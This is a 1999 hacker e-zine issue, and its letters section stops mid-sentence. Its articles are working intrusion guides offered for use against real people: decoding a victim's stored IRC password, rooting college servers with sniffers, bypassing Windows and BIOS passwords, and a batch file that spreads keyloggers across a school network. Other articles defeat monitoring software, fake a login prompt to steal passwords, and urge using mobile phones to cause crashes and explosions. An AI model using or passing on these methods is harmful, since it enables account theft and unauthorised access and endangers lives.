
                       :..:..:..:..:..:..:..:..:
                       :::::::::::::::::::::::::
                       ::::::::         ::::::::
                       ::::     ______     :::::
                       ::     °/   |  \       ::
                       :::    /    |   \_  :::::
                       ::::   \\       / \  ::::
                       :::::   \______/ _ \   ::
                       ::::        /      /  :::
                       ::         /  ____/    ::
                       ::::     _/  /_      ::::
                       :::::    \    /     :::::
                       :::       \ //        :::
                       ::::::     \/      ::::::
                       ::::       °         ::::
                       :::::::...........:::::::
                       :::::::::::::::::::::::::
                       :UNDERGROUND::PERIODICAL:
                       :::::::::::::::::::::::::

                       "We're on the Up and Up"
 
                       :..:..::..Issue..::..:..:

                          Issue 1 March 1999

                       :..:..::.Editor..::..:..:

                                Cyborg

                       :.::..Shouts Outs To.::.:

                                 G_H
                                fORCE
                                GPF#2
                               ZirQaz
                               Madboar
                              Hellbent
                              X-Crash-X
                              LordPhaxx

                       :..::..:.Website.:..::..:

                         http://upzine.8m.com 

                       :..::..:..E-mail.:..::..:

                           under_p@yahoo.com

                       :..::..Introduction.::..:

<*> Welcome to the first and thus foremost issue of Underground
Periodical. The staff has been planning this e-zine for 2 whole months
so we hope everyone thinks that it's good. The thinking behind Up is 
new wave, we wanted to create an e-zine that didn't try to be the
latest thing in the hacking scene but rather an interesting read,
something to make you think out loud. Our main aim is to keep on going,
so many e-zines die sometime in their first five issues. I urge you to
send us something to use, as you will get to plug your site at the end.

<*> Its readers write Underground Periodical. Without you we the staff,
the fancy ascii art, it all means nothing. You are the ones who write
the magazine. What we need to get started is submissions, send us in
your text files. We accept technical information, philosophy on the
state of the scene today, articles on free speech and censorship we are
interested in all innovations of computer culture, although we are
mostly based on underground stuff. Send your articles in text format to
the e-mail address at the top.

<*> The Periodical is written in text format so as readable by any O/S
such as Unix, Windows, Mac etc. We'd like to thank fORCE the most for
designing the ascii logo and anyone who has sent us articles and/or
wished us luck. The staff's number one goal is to stay afloat, a tough
challenge which I accept head-on. If you don't think you would be able
to write an article then why not upload Up1-01.zip to your site? You
will be mentioned as an official distributor if you let us know and it
will help plug your web-site.

<*> As well as submissions we need more staff. If you would like your
own monthly column then just send us an article and if we think it's 
good (and you say that you'd be interested in writing more) then you
might just have earned you a regular spot in Up. The only thing is
we can't accept files on the warez scene or porn as our extensive range
does not cover these topics.

<*> Tell your friends!!! Tell you pals on mailing lists and IRC
channels about the Periodical. We post our existence to a few
newsgroups but it just isn't enough. We can't be everywhere at once
so advertise us to your greatest mates. If you were doing an e-zine
I'd help you out. 

<*> We'd like to thank any and all people who submitted to Issue 1 or
contributed in any way. It is understood that they are automatically
included as Shout Outs. Without continued support from the h/p
community we wouldn't have gotten Up off the ground. Anyway, on with
this issue...

                       :..::.:..Contents.:.::..:

  <*>  1 - Inroduction & Contents   :  Cyborg
  <*>  2 - Cracking Pirch32/98      :  Daemon0
  <*>  3 - Ten Secure Steps         :  Byte
  <*>  4 - Pirate Radio Series      :  Cyborg
  <*>  5 - Bypassing Systems        :  DemonR
  <*>  6 - BIOS Backdoors           :  Nommo
  <*>  7 - NEC p800 Mobiles         :  HitMan
  <*>  8 - Security Programs        :  Cyborg
  <*>  9 - Letters\Feedback         :  Readers
  <*> 10 - Disclaimer & The End     :  Cyborg

                       :..::..End Of File..::..:

                       :..::..File 2 of 10.::..:
                       :..Cracking Pirch32/98..:
                       :..::...By Daemon0..::..:

<*> AIM: Have you ever wanted to go on IRC under your friend or enemy's
nick but didn't know their password? Today my friend you can learn how
to change that.

          Obtaining The Password File

Your victim must be using pirch either v 32 or 98.  The password and
other info that pirch uses is stored in a .ini file in the pirch dir
i.e c:\pirch98\pirch98.ini.

There are many ways in which you can obtain this file the ones i can
think of off the top of my head would be go to the victims house and
copy the file on a disk and tell him/her some bullshit excuse why you
need it OR you could use NetBus or Back Orifice to get it or you could
try some social engineering and try to get him/her to dcc it or
whatever.

          Finding The Encrypted Password

Open The .ini File and look under [user] here you will see there nick,
email address etc. look for the line beggining with "pw=" here is where
the Encrypted password is in my example below it would look like:

pw=здлло

copy this line in the .ini and move on.

          Encryption

Below is a list of all characters and its Pirch Encrytption:

lowercase alphabet
----------------------------------------------------
a b c d e f g h i j k l m n o p q r s t u v w x y z
	
а б в г д е ж з и й к л м н о п р с т у ф х ц ч ш щ
----------------------------------------------------

UPPERCASE ALPHABET
---------------------------------------------------
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z

А Б В Г Д Е Ж З И Й К Л М Н О П Р С Т У Ф Х Ц Ч Ш Щ
---------------------------------------------------
	
Other Characters,  note: the ! character is a space when encrypted
into ( pirch language ) ie its just a blank space in the encrypted
password field in the .ini file. 

--------------------------------------------------------
!"Ј$%^&* ( ) _ + < , > . ? / : ; @ ' ~ # { [ } ] \ - ` |
 Ў"Ј¤ЭҐ© § Ё Ю Є » « Ѕ ­ ѕ ® № є ї ¦ э ў ъ Ъ ь Ь Ы ¬ Я ы
--------------------------------------------------------

Numbers
--------------------------------------------------------
1 2 3 4 5 6 7 8 9 0

° ± І і ґ µ ¶ · ё -
--------------------------------------------------------

          Cracking The Password

Ok so now you have the encrypted password all you have to do is compare
each encrypted character to the ones beneath the english characters and
from there match up the english character, so if the encrypted password
is здлло then I will match them up.

з = h
д = e
л = l
л = l
о = o

So the real password is "hello", its not that hard. From past
experience i have noticed that alot of people use the same password for
everything like IRC, E-mail, ISP account etc. I managed to log into my
freinds e-mail and ISP using his IRC password, so experiment.

Thats it for just now if you have any problems e-mail me at:

mike@rainz.freeserve.co.uk

--Daemon0

                       :..::..End Of File..::..:

                       :..::..File 3 of 10.::..:
                       :..:.Ten Secure Steps.:.:
                       :..::.:..By Byte..:.::..:

<*> Byte --- byte@cork.crosswinds.net

This is an idea on how to learn more about security, if you rush these
steps, you will be just fooling yourself, IT WILL TAKE TIME, the sooner
you face that the less mistakes you will make.

1. Get a UNIX O/S, Linux is the best to start with, however after time
you will soon find many drawbacks, but its a very good start to a UNIX
o/s.

2. Mess about with localhost, basically teach yourself to be an admin,
install patches and secure your own box.

3. Find out about networking, get a PPP Internet account if you are
interested in hacking things on the Internet. While your are doing this
learn more about networks, services routers daemons.

4. Use IRC, something like using Undernet and going to #hackphreak
is a good start, dont ask things like, how do I have a .mil or how can
I rip off my friends credit card.

5. Now getting one or two ORA books would really help you on your ways.
Read man pages and just make sure you know your way around a UNIX box
like you've known it all your life.

6. At this point, learning how to program is very useful (but not
essential) Pascal is easy to learn and will help you understand
programming, however C is OK to learn and you can use it in your
hacking, you wont be able to use Pascal.

7. Now move to Free/Open/Net BSD, which are allot closer the real UNIX
O/S. Solaris, since it is free now, is also a good option.

8. Go get all the papers you can find, not just hacking ones, but ones
on security, http://www.rootshell.com and go to the papers section.
Read them all and MAKE SURE YOU UNDERSTAND them. Subscribe to Bugtraq.

9. By now you may well know enough to hack, go find some host on a 
collage, just as a test of your skill, try and find out everything 
about it, this would mean doing traceroutes hacking it and installing
passwd sniffers (which is very useful) and logging processes.

10. Now use the sniffer log and get root on other boxes. If this all
went well (and undetected) you may now have root on every server in the
collage.

NOTE:

Never fuckup any servers (unless its a kkk or the www.rotten.com server
or something like that). Its lame and some sys admin probably spent
endless nights to have the server in working order.

To be continued........................

Please feel free to email me

                       :..::..End Of File..::..:

                       :..::..File 4 of 10.::..:
                       :..Pirate Radio Series..:
                       :..::...By Cyborg...::..:

<*> Pirate Radio Series Part I

Introduction: This file deals with starting your own pirate radio
station. It is a part one of a four part series on pirate radio. I've
researched many sites on the internet combine with my own knowledge
to write this file.

Getting Started

 - Building A Production Studio

Unless you plan to broadcast some sort of pre-produced programming, or
plan to rebroadcast other pirate radio stations, chances are you will
need to put together your own material for broadcast. In this section
I will mention some of the ways you can build a production studio that
will serve your particular needs.

A production studio does not need to be something you might see at a
commercial radio station, all those soundproof screens and such are
not necessary. I'll assume for now that you will be preparing pre
recorded material for broadcasting at a later time. Much of this
material will also apply to a live setup. As far as content goes, you
could use anything your imagination can conceive.

To prepare a taped program, all you need is a way to record on the
tape, this can be a small pocket tape recorder. You can simply record
your message and use the pause control to perform minor edits. After
you have completed the messages the recorder can be connected to the
transmitter and the show played back over the air. Most pirates want
more creative freedom than this, some pirate stations have studios that
rival commercial setups, as you grow with the pirate radio hobby it is
likely that your studio will also grow. It is almost always a good idea
to start small and improve your setup as you need to, don't get too
anxious and spend all your money buying equipment unless you can't
operate without it.

One of the first additions that are made to a pirate studio is a mixer.
A mixer is a device that allows you to connect the outputs of various
components (such as turn tables, CD players, tape decks, microphones,
etc) to its input. The mixer's output is then connected to the input
of a tape recorder. The mixer combines these signals and allows you to
vary the volume of each signal. This facilitates talking over music,
fading from one source to another, and gives you infinite control over
all of your audio levels. A mixer can add a professional sound to any
studio.

Now that you have built your studio and made your first program, it is
time to broadcast it for the world to hear. One obstacle still remains:
how do you get the audio from the tape deck to the input of the
transmitter. Much of this will depend upon the type of transmitter you
have chosen. In most cases the audio source from the tape deck will
replace the microphone on the transmitter. This is one reason it is a
good idea to have to manual for your radio. 

It will likely be necessary to wire the output from your tape recorder
to a plug that fits your radio. This may include a switch to enable and
disable the push to talk function of your radio. Since this varies
widely from radio to radio I can only refer to this in the most general
terms. If you are not electronically inclined, you should find a friend
to help you with this. It is not a difficult task on most radios.

 - Producing A Show

What you decide to put on the air is only limited to your imagination,
maybe it please you to produce a h/p related show with the latest info
from hacker news websites or playing DTMF tones over the air. One of
the greatest aspects of pirate radio is that it isn't censored by
companies paying advertising fees or governmental agencies. What you
decide to put out there is your choice as an individual, remember that.

Once you have set up your studio and decided it is time to produce a
show, you will likely have a certain subject matter or format in mind.
If you don't, then take some time and review why you wanted to be a
pirate in the first place, was it to make a certain point or political
view, do you want to entertain or inform, do you just want to play your
favorite music, or do you want to do all of the above? In most cases
you will be successful at anything that you enjoy doing.

Here are some general tips:

* ID your station often

Speak clearly and repeat your ID. It also helps to have different
people give your station ID; some voices are easier to understand
through the noise than others. Regular listeners need something they
can identify with. A short witty name which sounds easy to remember
is what I suggest. Also, some stations always play the same song at the
beginning or end of their broadcast.

* When editing a tape, make the edits clean and tight

Long pauses are always a killer. However some tapes cut a couple of
seconds off the start so begin with a pause. If you are recording to a
cassette tape, and you have a good recorder, you can use the pause
control to make fair edits but be sure to go back and check the edits
often, most decks are designed with the erase head placed up to an inch
away from the playback head, this can create a longer than desirable
pause. Practice editing with your tape recorder first.

* In most cases it is wise to avoid live broadcasting

To broadcast live and sound good is a VERY difficult thing to do. This
is not to say it cant be done, many stations have the talent and
experience to do it well. However, others do it and it is disastrous.
Live broadcasts can result in lots of dead air; if you encounter a
problem you will have to be prepared to solve it while maintaining a
live show in the air. If you tape your shows you will have time to
review what you have done and redo it if needed, you can take as long
as you like to think of what to say next and you will almost always
sound better. 

* Ground your studio equipment and use shielded cables

Do this to prevent audio "hiss" and equipment "hum". Use quality
recording tape (you get what you pay for). Use quality audio input,
avoid scratchy records and bad tapes, If you use a poor quality
microphone your audio could sound "muddy" or "tinny", good mikes aren't
always expensive.

Look out for Part II of this series where I will discuss transmitters
and going on the air. Well I hope this has been an informative read. If
you would like to e-mail me regarding anything in this file then go
ahead. If you are interested in hacking, phreaking or programming then
e-mail me or visit my website:

                          cyborg@disinfo.net
                        http://cyborg.ie.8m.com

                       :..::..End Of File..::..:

                       :..::..File 5 of 10.::..:
                       :.:.Bypassing Systems.:.:
                       :.:.::..By DemonR..::.:.:

<*> File: General info on breaking into local systems
About: Mainly focuses on Windows 95, 98 and NT.

		  <*>------------------------------<*>

Well well, you've got a system sitting in front of you... but you cant
access it all? Oh well, this likkle file might help.

*** Windows 9x

First the passwords in 9x are so easily gotten past that most system
admins will use some sort of proggie to stop you doing stuff. However 
if you can get past the admins password then, well you can guess, and 
well its easy.

General Aim:- Your aim is 1 of 2 things,

1- Rename c:\windows\admin.pwl to something else
2- Gain write access to c:\windows\system.ini

Why?

Pretty simple realy, if you rename the file well windows doesn't cop on
and it asks you to enter a new password. Doh! The secong method is the
same principal , <system.ini> stores the name of the <.pwl> file, so if
you tell it the <admins.pwl> is <gook.pwl> it wont find it and ask you
to enter a password. 

How?

Well the main way would be to boot into either DOS mode or Safe mode.
From there all the restriction programs have no effect so you can roam
at will.

To boot into safe mode, you can either hold shift down at the start up,
or press F8 just before it says Starting Windows 9x. That gives you a 
menu from which you can choose safe mode. Once in safe mode you can go
to the run in the start menu and then type in:

<notepad c:\windows\system.ini>

and then edit it (see later in the file).

To boot into DOS mode its pretty much the same, 2 common methods, one
press F8 and pick <command prompt only> and it boots up into DOS mode,
the other way is to put in a boot disk before it boots up. It should
boot up in DOS mode. Once there type in:

<edit c:\windows\system.ini>

Now what?

Well once you've got <system.ini> then all you have to do is search for
the password. You should then see something like this
	
        [Password Lists]
	NOBODY=3DC:\WINDOWS\NOBODY.PWL
	ADMIN=3DC:\WINDOWS\ADMIN.PWL
	ANYONE=3DC:\WINDOWS\ANYONE.PWL

Well all you have to do now is change the last bit so it looks like 
this:

	[Password Lists]
	NOBODY=3DC:\WINDOWS\NOBODY.OLD
	ADMIN=3DC:\WINDOWS\ADMIN.OLD
	ANYONE=3DC:\WINDOWS\ANYONE.OLD

Or whatever suits your mood. Just remember the original names so you 
can restore them after your fun, as to not raise suspicion.

Alternately you can, when in DOS, (if your in windows in safe mode 
simply type in <command.com> in the run box) you can type in: 

<rename c:\windows\*.pwl c:\windows\*.old>

and that should do it.

Problems:

Well you could encounter some problems

1- F8 wont work??
Well the admin has probably changed a line in msdos.sys which disables
this key during boot up, use a boot disk instead.

2 - Boot disk wont work??
The admin has probably disabled the availibilty of booting from floppy
in the BIOS. Well then try the F8 key or holding Shift down, if that
doesn't work well there is one thing you can try...

The BIOS:

Well usulay it says how to get into the BIOS on the startup something
like:

Press Del to Enter Setup

Or

Press F* to Enter Setup

Well just do as it says. Although I have seen some compaqs cover up the
screen which tells you which button to press, so just try F* or Del
etc. If you get in without a password well you can change where the
machine boots up from, usualy you pick from a sequence, e.g C, A, SCSI
or A, C, ZIP. You want the A first, ie the floppy drive.

P.S careful of the BIOS it can fuck up stuff easily.

*** Windows NT
               
Well its way more secure than 9x, but thats not hard. Its still
possible to break into NT. Unlike 9x, in NT you actully have to crack
the passwords and not just rename them. So first you have to get
them... There are a few programs availible for dumping NT passwords
from the registry. e.g L0phtcrack, or NTdump which is availble from my
site <www.newbiehack.8m.com>. But theres a problem about that... you
need admin status to gain access to the registry, hmmmm. How do u get
admin status? well of course there are exploits availible, from my web
site, and loads of other places :-) which lets guests have admin
status. Once an admin, you can dump the passwords from the registry
and crack them using NTcrack, or l0phtcrack, the second is better, as
it has everthing combined into one.

I can't get admin status :-(

Well... there is a program going around that is hard to find, but
once you have it, you can do anything. its called NTFSDOS.exe and what
it lets you do is have access to the NT drive from DOS. so you can boot
up of a DOS floppy and run this. And since it is accesses the drive, it
ignores the file permissions... and you can get the registry file or 
the password file... and then just crack it.

Network stuff. If your school or whatever has a network. when you get
admin status you can wreak havoc on the network. e.g. Usualy the server
has a drive mapped on every machinge e.g I:\ or something. Well. Say 
you put a program on every machine you go to. Just a small batch file.
You put in the start up. and what the program does is. runs a program 
on the mapped drive. Then you can update all your trojans, key loggers
etc remotely, hahaha for e.g You have every machine (or most) running a
file called update.bat every time they start up. Update.bat could be:

	@echo off
	copy I:\winnt\system\net5.dll c:\
	ren c:\net5.dll c:\updateme.exe
	updateme.exe > nul        <--------- The > nul means it doesnt 
        del /y c:\updateme.exe            print anything on the screen.

Well then you make a program to install your newest key logger, go to
the file server and put it on the i: drive under the name net5.dll of
course you have to have access to the main machine, but if you can get
the password file etc. and you have admin status the its easily done.
Some machines let you write to them as guest so take advantage of this.
Its possible to control *your* network with just batch files. Ask GPF#2
:-) he did it...

Well the above info isnt very exact, but hopefully you will take the
initave to work out how break into networks etc from the above.

                          demonr@Phreaker.net
                        http://newbiehack.8m.com

                       :..::..End Of File..::..:

                       :..::..File 6 of 10.::..:
                       :.:...BIOS Backdoors..:.:
                       :.::.:...By Nommo..:.::.:

<*> By now you should all know that BIOS passwords are not exactly 
top-security.  BIOS password crackers are nice little utilities, and
might be handy if you are lucky enough to actually be inside the
system, but how do you get inside it in the first place? Luckily, the
stingy BIOS manufacturers have implemented backdoor passwords to save
money when people phone up telling them that they've forgotten their
password, so all they have to do is to type in these special codes, and
they will get through the password screens and can change their old
password. BIOS passwords will keep those honest people out but provide
no protection against dishonest (I'd rather say curious) ones.

Ahem.

On to those codes:

I will only give you the most common manufacturers' backdoors, for
others, have a search on the 'net. NB. These are all case sensitive,
so type carefully. And when you're finished, don't change the original
passwords for the user, that's plain lame...

AMI BIOS:
---------

AMI
AMI_SW
AMI?SW
A.M.I.
BIOS
HEWITT RAND
LKWPETER
PASSWORD
589589 (AmiBIOS 4.5x)

AWARD:
------

589589
589721
ALFAROME
aLLy
AWARD_SW
AWARD_PW
AWARD?SW
awkward
BIOSTAR
j256
j262
HLT
lkwpeter
LKWPETER
SER
SKY_FOX
Syxz <-Nice

Others:
-------

Phoenix also have backdoors - can't remember them off-hand.

Can't remember what these work for, but try them out if desperate:
condo, djonet, lkwpeter, biostar, biosstar

IBM Aptiva's can be cleared by holding down both mouse buttons at 
boot-up until the computer boots. Toshiba laptops can bypass the 
password by holding down the left shift key during boot-up.

If none of this works, on some computers, flooding the keyboard buffer
will crash the password routine and allow the computer to boot. That 
means you keep hitting ESC at the password prompt. This may require 50
to 100 presses, and may not work in all machines, but its worked
before, and is worth a try.

The other method is to short the jumper on the motherboard by touching
both the wires together for about 10 seconds.  Some motherboards get
damaged if you do this when it is on, so I suggest you do it with the
computer turned off. Remove the jumper, turn the puter on, then if
that fails then turn the computer on with the jumper in place. This
will clear ALL the CMOS settings, so only do it when in dire need or
when you know all the correct CMOS settings and have them written down.
Better safe than sorry!

From this, I hope you have learnt that BIOS passwords aren't exactly
the safest thing in the world!  If one person learns one thing from
this article then i have done my job!

Laters,

Nommo

thenommo@mailcity.com
http://UphreaK.8m.com

Other texts by meself:

How to get around school proxy servers
 - An overview and several methods

                       :..::..End Of File..::..:

                       :..::..File 7 of 10.::..:
                       :.:..NEC p800 Mobiles.:.:
                       :.::.:..By HitMan..:.::.:

<*> My expertise in the cellphone area is not by any means excellent
and I am not for one moment saying it is but I do insist that if you
have a mobile lying around the house that you should do as much damage
as possible and that includes becoming a maniac so far as creating
explosions and causing plane crashes so have fun.

Just some of the best fun can be done right in front of your house even
in places that you thought where 100% free of danger, because now you
have just interupted them in a way they will not forget. In an auto-
mobile you can fuck it up by turning on the moblie phone and causing
your anti-skid breaks, your speed control and your fuel injection to
become dead as if they never ever powered up. On an aircraft you also
interfere with it's much needed resources and causing the plane to go a
couple of thousand degrees off course by interfering with the
navigation system. It would also be fun when an area tells you to "turn
off two-way radio" and to ignore it, causing major damage as you ignite
a shitload of chemicals KA-BOOM!

Of course i'm by no means saying you should go out and do this as if
you do it would be your own choice. What i am saying is by doing this
you are putting a lot of lives at risk so just don't do something
you're going to regret in later years when your being fucked up the ass
by your cellmate.

Here's a quick guide to most phones O/S but as always i have based this
on my phone and some others may vary in their own ways, This I based on
the NEC p800 and some features may not work in different countries.

The screen would look like this:

 ----------
|*****     | * = Bat level 
|   11:30AM|   = Time 
|Wed 24 Jan|   = Date
| EIRCELL  |   = Selected network 
 ----------

:..Function summary..:
:..Keystrokes............Effect..
:..F(briefly)            Display battery level or display phone number
:..F(hold)               Display higher digits of a long phone number, 
                         or display first menu item
:..F(hold) in car kit    To switch between handsfree and handset
:..F0                    Insert pause
:..F1                    Timer readouts
:..F21                   Set clock and calendar
:..F22                   Set alarm and automatic power on/off
:..F23                   Set 12hr/24hr format
:..F41                   Set ring tone volume
:..F42                   Set ring type
:..F43                   Set keypad tone volume
:..F44                   Set DTMF tone length
:..F51                   Set auto-answer (car)
:..F52                   Set external control (car)
:..F61                   Clear recent call data
:..F62                   Set auto-lock
:..F63                   Set international call barring
:..F64                   Set memory lock
:..F65                   Change lock code
:..F66                   Reset phone to original settings
:..F67                   Set maximum credit units (if programmed)
:..F68                   Set PIN
:..F71                   Set power-on message
:..F72                   Set battery saving
:..F73                   Set display language.
:..F74                   Set network
:..F8                    Set microphone mute
:..F8(hold)              Set line hold (during call)
:..F M+                  Set or realse keypad lock

As I have already said these are for a NEC p800 so if they don't work
on your phone you can go out and buy one so that they do work.
 
                              [-=HitMan=-]

                        vectra500@geocities.com
                        http://hitman.ie.8m.com

                       :..::..End Of File..::..:

                       :..::..File 8 of 10.::..:
                       :.:.Security Programs.:.:
                       :.::..:.By Cyborg.:..::.:

<*> Introduction: This file deals with security programs and how to
beat them. These are just the easy ones of course. Security programs
with elaborate encryption schemes will not be covered. However, it may
prove useful to know flaws in common programs.

Program #1 - Winlock

This program locks out key security functions to Windows and can only 
be turned off with the password. When faced with the password prompt 
type WINLOCK in all capital letters and then press OK. This is the
default password and works all the way up to v 5.0 as far as I know.
Failing this, try to corrupt the EXE by opening it in Dos Edit and
deleting characters all over the place. This might crash the system 
but it's a good last gasp attempt.

Program #2 - Desktop Surveillance

This program records what you have been doing. Not keystrokes mind you,
and exact playback of your screen. It doesn't have a password feature
though. You are not supposed to know it is there. Press CTRL+ALT+DEL
to view the task list. It is named Osa. Doesn't sound like a
surveillance program does it? Well "End Task" all the same. If your
boss/parents is suspicous about it just closing you might try writing a
small program to feign an illegal operation in explorer. When that
crashes all existing windows and programs will close. The last thing
seen on the playback will be an error message.

Program #3 - IconLOC

This program puts a password lock on icons. Going to an EXE through
RUN does not overide. It is actually a lock on the program unlike the
title. If you want to know the password in the unregistered version
simply right click, than go to properties, then the shortcut tab and
you will find it in the command line between the IconLOC path and the
shortcut path. If you need to know more than just the last password
then you might be interested in a program I coded in Visual Basic last
November called Trickster. Everything about it looks like IconLOC in
every way except when you enter the passord and press OK it saves the
password to the clipboard viewer. If anybody wants it just e-mail me.

Program #4 - Keylog 98

This is actually a monitoring program. It records your keystrokes. It
is great for finding passwords but not so great when somebody is 
running it on you. To throw you off it is listed on the Task List as
Dllman32 so that it looks like a DLL manager, too important to be 
messing about with. Press "End Task" to close. The logs are stored in
the following directory:

c:\windows\system\97x\

That's if you need to recover logs or want to erase past entries. The
logs are so muddled up that no-one will be able to tell any difference
when it comes to closing it or omitting log entries.

Program #5 - Serv-U

This program runs a temporary FTP server on your PC and there is a 
certain command which can be pretty harmfull... First, (in DOS) log in 
with localhost as "anonymous" user, then type:

ls- lga c:\autoexec.bat 

and it over-writes the autoexec.bat with the list of files in the dir.
Now keep in mind the c:\autoexec.bat files are meant to be unreachable.
This works even when the only access you are supposed to have is to 
upload to the upload dir.

Program #6 - Foolproof

This program can block access to certain directories in the system by 
"intercepting interrupt 13h". To access any of the protected 
directories, simply go into any Office 97 application and go to the 
Macro Editor. From there, you can use the CopyFile command, Kill (to 
delete files), or any other file operations.  This allows you full 
access to the file system. Foolproof can also disable every application
in the system except for specified ones that are set in the control 
panel. To bypass this protection, use macros to overwrite an allowed
application, such as Publisher 97/98. Then, you run the application 
through the shortcut that you usually run Publisher from.

Program #7 - Lockdown 2000

This program claims "total security". Unfortunately it cannot deliver
on it's promise. First run boserve.exe. I know that BO is lame but it
is worth publisising bugs to encourage the development of better
software. Lockdown spots a BO server. Now choose to reboot the machine
to remove the trojan. On reboot, the trojan check again finds the BO
server and shows the same warning, and the same promise of removal and
recommendation to reboot. But it has not been "removed from Windows
start-up." Now run Regedit and in the Lockdown directory you will see
two keys " .exe" and "Removed By Lockdown2000". As you see, the Back
Orifice " .exe" command remains where it is, untouched, and Lockdown
has added a false gloat of victory to the Registry.

Well I hope this has been an informative read. If you would like to
e-mail me regarding anything in this file then go ahead. If you are
interested in hacking, phreaking or programming then e-mail me or
visit my website:

                          cyborg@disinfo.net
                        http://cyborg.ie.8m.com

                       :..::..End Of File..::..:

                       :..::..File 9 of 10.::..:
                       :.:..Letters\Feedback.:.:
                       :..::...By Readers..::..:

<*> This is the part of the e-zine where we respond to e-mails and
questions and stuff. Most of the mail we have recieved so far is in
response to newsgroup posts and from people who have seen the website.
The original mail headers have been left in as we aren't going to
protect people who send us lame messages. Keep those intelligent
e-mails flowing in. Everybody likes a bit of encouragement. The e-mails
are indexed in order of the date they were recieved.

                       :..::..Convince Me..::..:

From: "NoPhun" <no.fun@ebox.tninet.se>
To: <zengus@yahoo.com> 
Subject: SV: h\p e-zine

I have written some stuff , and if I send them to you , whats in it for
me ?
Information wants to be free , I know . I might send you my article on
hacking win9* (from the outside and the inside) but it's kind of a file
for
beginners . Tell me if you want it .

>Submit!!! Submit!!! Submit!!!
>
>We NEED files!!! I myself will be writing files
>but Up e-zine cannot survive without articles.
>If you have written any text files then please
>submit them. Send articles to: zengus@yahoo.com

                        <*> <*> <*> <*> <*> <*>

Let's just get this straight... You want some sort of prize because you
might send us your article on hacking Windows for beginners. How about
instead you never e-mail us again. Nobody else asked for something. Why
should you feel special. You should help spread knowledge. You really
are NoPhun, just some boring dude on the net.

                       :..::...Ascii Logo..::..:

From: "/" <feckoff69@hotmail.com>
Reply-To: "/" <@btinternet.com>
To: <zengus@yahoo.com>
Subject: Re: h\p e-zine

>Date: 27 January 1999 18:56
>Subject: h\p e-zine

i doubt i can help you article wise with your ezine coz i am already
involved with another zine (FAiTH MAG) but i had an ascii art which i
adapted to suit your zine
you might wanna use it for whatever
just mention it was by me
 :)

good luck with the zine

fORCE

<cut and paste it into notepad>

                       :..:..:..:..:..:..:..:..:
                       :::::::::::::::::::::::::
                       ::::::::         ::::::::
                       ::::     ______     :::::
                       ::     °/   |  \       ::
                       :::    /    |   \_  :::::
                       ::::   \\       / \  ::::
                       :::::   \______/ _ \   ::
                       ::::        /      /  :::
                       ::         /  ____/    ::
                       ::::     _/  /_      ::::
                       :::::    \    /     :::::
                       :::       \ //        :::
                       ::::::     \/      ::::::
                       ::::       °         ::::
                       :::::::...........:::::::
                       :::::::::::::::::::::::::
                       :uNDERGROUND::pERiODiCAL:
                       :::::::::::::::::::::::::

----
"the voodoo who do what you don't dare do people"

                        <*> <*> <*> <*> <*> <*>

That is a reply we got from a newsgroup post. We'd like to thank fORCE
again as he took it upon himself to design the logo without previously
knowing us. You can d/load FAiTH e-zine at http://darkcyde.8m.com/faith

                       :..::...Text Files..::..:

From: "James Truncellito" <james@vglobal.com>
To: <under_p@yahoo.com>
Subject:

hey man go here there are text files comin out the ass on here, and if
you need any help with the zine let me know    

Attachment Content-Type: application/octet-stream
name=Shortcut to Library of Information.URL
Content-Disposition: attachment
filename=Shortcut to Library of Information.URL 
Content-Transfer-Encoding: base64

                        <*> <*> <*> <*> <*> <*>

Please don't send us URLs of places where we can illegitimately steal
other people's text files. The articles must be submitted by the author
or else it defeats the whole purpose. If you want to help us out you
should write us an article.

                       :.::..Do It Yourself.::.:

From: Der angry gottchman <gottfred@warpcrew.com>
To: zengus@yahoo.com
Subject: Re: Underground Periodical

On Sun, 7 Feb 1999 zengus@yahoo.com wrote:

> Hey all,
> 
> It's Cyborg here. The editor of the
> Undeground Periodical e-zine. Anyways,
> we still don't have enough articles
> submitted to put out Issue 1.
> 
> So if you have some text files on
> your site or you were thinking about
> writing a file then please send us
> stuff at:
> 
> cyborg@disinfo.net
> 
> It would be really helpful plus you'd
> get to plug your site at the end of your
> article, so come on, whadda ya say?
> 
> Cyborg
> 
Ever considered writing something on yer own?

Gottfred has a sheep

                        <*> <*> <*> <*> <*> <*>

Maybe if you didn't bug us with your pointless and stupid e-mails we'd
be able to get some work done!

                       :..::.:..Op Codes.:.::..:

From: addou omar <"Gebruikersnaam@wxs.nl>
Reply-To: "Gebruikersnaam@wxs.nl
To: webmaster@upzine.8m.com
CC: under_p@yahoo.com
Subject: Op codes in mIRC

Do u know some tricks, cheats or codes to in mIRC.
Thanks
Countdown

                        <*> <*> <*> <*> <*> <*>

There are no secret codes in the mIRC client that give you ops. Did you
get confused with Quake when you asked for cheats? Turn off your
computer and go do something in real life for a change.

                       :..::.:.::.IRC.::.:.::..:

From: "Felix Harris" <felixh@netcomuk.co.uk>
To: zengus@yahoo.com
Reply-to: felixh@netcomuk.co.uk
Subject: Underground Periodical 


I dont know much in the way of hacking, but I know quite a lot 
about IRC, and how to keep and take channels. Plus other IRC 
related things
Felix Harris 
felixh@netcomuk.co.uk
Website down temporarily

                        <*> <*> <*> <*> <*> <*>

Ok. We would be very interested in an IRC file as it would show that we
go beyond just hacking files. You can reach me on Dalnet IRC network:

/msg memoserv send Cyborg^ <message>

                       :.::..Happy To Help..::.:

To: zengus@yahoo.com 
Organization: AOL http://www.aol.com 
From: empire3219@aol.com (Empire3219) 
Subject: Re: Underground Periodical 

>Hello,
>
>I'm Cyborg, the editor of an upcoming e-zine called Underground
>Periodical.
>Unfortunately, we don't yet have enough  articles for Issue 1 so I am
>appealing to newsgroup readers of the underground to send us original
>text files about Hacking, Phreaking, IRC, Virii, Free Speech and
>more...
>
>We hope that this e-zine will be around for a long time and I will
>announce
>it's release on these very same newsgroups when it comes out. Our main
>aim for the future is not to die out, to keep on going. To do that the
>people
>who read it will have to write it, by that I mean reader submissions.
>I will
>look forward to reading the replies...

I'm interested in helping you out and contributing to your e-zine. 
However,
since I publish a catalog and we are in print, I'm short on time at the
moment. Hell, I still have the web site to finish.  If you have any
guidlines that need followed, let me know.

Empire3219@aol.com
or 
Grendel_3219@yahoo.com

                        <*> <*> <*> <*> <*> <*>

The only guidelines you need follow are no pornography or warez. We are
also aiming this at the global community so try not to limit the file
to just America or just the AOL network. Hope your catalog works out.

                       :..::...Newsletter..::..:

From: "Maillist" <maillist@bhic.net>
To: <under_p@yahoo.com>
Subject: Newsletter

If you're creating a mailing list, I'd like to be added.

maillist@bhic.net

                        <*> <*> <*> <*> <*> <*>

How many times must this question be answered!?! Up is an e-zine, NOT
